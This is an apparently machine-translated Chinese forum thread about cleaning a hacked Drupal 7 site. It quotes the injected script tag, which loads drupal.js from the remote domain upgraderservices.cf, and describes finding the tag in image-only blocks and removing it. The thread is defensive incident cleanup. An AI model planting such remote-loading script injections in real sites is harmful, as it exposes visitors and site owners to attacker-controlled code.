在我的一个老年人Drupal 7安装中,我在我的页面源代码中找到了这个js参考。
<script type="text/javascript" src="//upgraderservices.cf/drupal.js"></script>
根据我的谷歌搜索,这可能是由drupalgeddon恶意软件引起的。我已经阅读了一些如何清理系统的提示,但大多数建议从以前的备份恢复服务器。但是,我不想放弃当前的评论,并希望进行手动清理。
这个脚本在哪里以及如何添加?我认为它可能包含在drupal块中。但当我禁用所有块时,脚本仍然存在。
我认为它必须在drupal bootstrap过程中的某个地方。任何想法从哪里开始以及添加哪个文件(php?)附加drupal.js?
在我的情况下(drupal 7),黑客被插入到只有一个图像的所有块的html源代码中。在我的案例中大约有10个实例。我通过在'source-mode'中编辑用户界面中块的内容来删除它们。